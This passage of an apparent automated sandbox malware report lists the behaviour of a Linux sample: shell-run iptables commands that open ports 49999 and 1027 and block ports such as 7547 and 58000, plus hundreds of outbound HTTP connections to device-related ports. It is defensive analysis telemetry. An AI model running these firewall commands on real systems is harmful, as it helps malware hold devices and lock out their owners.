                            Source: /bin/sh (PID: 6290)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6293)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6302)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6308)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6315)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6318)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6324)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6350)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6366)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6374)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6380)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6386)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6392)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6398)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6404)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6410)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6416)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6422)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6428)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6434)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6443)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p udp --destination-port 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6448)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --source-port 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6454)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6457)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6460)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p udp --dport 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6463)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --sport 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6469)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6475)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 1027 -j ACCEPTJump to behavior
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34030 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36824 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34694 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54246 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53110 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60360 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60462 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51586 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37286 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49442 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53158 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47278 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50598 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52542 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55872 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45204 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49332 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50372 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37388 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35796 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43448 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49374 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36434 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53898 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40292 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59518 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51156 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49352 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39810 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32874 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44724 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49576 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51456 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35190 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57436 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40362 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58502 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45614 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40904 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60758 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40170 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45060 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47554 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52578 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55684 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36744 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47906 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44962 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48206 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47336 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36822 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33346 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55738 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36670 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55166 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42728 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46434 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45762 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51804 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35314 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45642 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53608 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37904 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42858 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53114 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47338 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59258 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59858 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41440 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59536 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51730 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59134 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54560 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54190 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46938 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53284 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50418 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43434 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59392 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50486 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54686 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41678 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34104 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45902 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53360 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52050 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52982 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37814 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47440 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54304 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34690 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47146 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45700 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54840 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49594 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52078 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44882 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41854 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48730 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32996 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58080 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51200 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39176 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60888 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53488 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57912 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52944 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47612 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34970 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44728 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51426 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54388 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33120 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37312 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44998 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59688 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47284 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41420 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51114 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36494 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40718 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47836 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58078 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37408 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41302 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49044 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59020 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45758 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44922 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60122 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48102 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59254 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34102 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32814 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56438 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48340 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47496 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53256 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49434 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46748 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33270 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40366 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56406 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57186 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37318 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36252 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36602 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41056 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57340 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53394 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52308 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48580 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57690 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43540 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41842 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47926 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42954 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57150 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37892 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51244 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49652 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56356 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48634 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46862 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40496 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47696 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60760 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54142 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55938 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34524 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46350 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60808 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53368 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46238 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57654 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50436 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57660 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58408 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54100 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39352 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57032 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42286 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59878 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59072 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36370 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57452 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54752 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40410 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42296 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45458 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58124 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33168 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57308 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48772 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52072 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53342 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36572 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54682 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47518 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44058 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44086 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58964 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32956 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32846 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58148 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39906 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52340 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34242 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44326 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51622 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58788 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49260 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46258 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56786 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50770 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59614 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44048 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41670 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59578 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53194 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57944 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46288 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38750 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32884 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36150 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54248 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55898 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55846 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35422 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48992 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54110 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45652 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43718 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37440 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60274 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43520 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45952 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39824 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49658 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34456 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39076 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41460 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42486 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55920 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59080 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59872 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45786 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44778 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37556 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35102 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35140 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46686 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41552 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47784 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40512 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60862 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56896 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54338 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47860 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44166 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51864 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40208 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51046 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41268 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55726 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59172 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36540 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34340 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37352 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55346 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50776 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54940 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47122 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44486 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58840 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46674 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38990 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51896 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52126 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56716 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39240 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42546 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38998 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37752 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54150 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54556 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51266 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59810 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37578 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36264 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52436 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39386 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56564 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58626 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40176 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55512 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58674 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43382 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34170 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41166 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37802 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54280 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59258 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33984 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43734 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51798 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34558 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44866 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35598 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59314 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57782 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47624 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48798 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40116 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34266 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58212 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45382 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56088 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57870 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39128 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53064 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60554 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36570 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33468 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52706 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55100 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53608 -> 7574
